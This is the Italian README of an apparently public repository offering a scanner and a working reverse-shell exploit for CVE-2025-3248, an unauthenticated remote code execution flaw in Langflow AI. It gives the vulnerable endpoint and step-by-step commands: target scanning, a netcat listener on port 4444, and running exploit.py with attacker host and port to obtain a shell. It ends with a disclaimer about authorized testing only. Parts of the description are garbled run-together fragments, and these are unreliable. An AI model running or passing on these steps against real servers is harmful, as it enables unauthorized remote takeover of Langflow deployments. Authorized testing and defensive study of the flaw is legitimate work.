
Scanner ed exploit per CVE-2025-3248, una RCE non autenticata in Langflow AI. Include un controllo vulnerabilità e un generatore di payload reverse shell per test di sicurezza autorizzati.
Questa repository contiene due script Python:
LangflowCheck.py: Uno scanner che verifica la presenza di istanze Langflow AI vulnerabili a CVE-2025-3248.exploit.py: Un exploit funzionante per reverse shell su target Langflow vulnerabili.CVE-2025-3248 è una vulnerabilità critica in Langflow AI che consente ad attaccanti non autenticati di eseguire codice Python arbitrario da remoto tramite un payload appositamente costruito inviato a /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) e la porta del listener (lport).exploit.log.pip install -r requirements.txt
Singolo URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Target multipli
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

Per prima cosa, avviare un listener
sudo nc -nvlp 4444

Quindi, eseguire l'exploit:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Se il target è vulnerabile, si dovrebbe ricevere una shell.

Questo exploit è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. Non utilizzarlo contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicito permesso di test.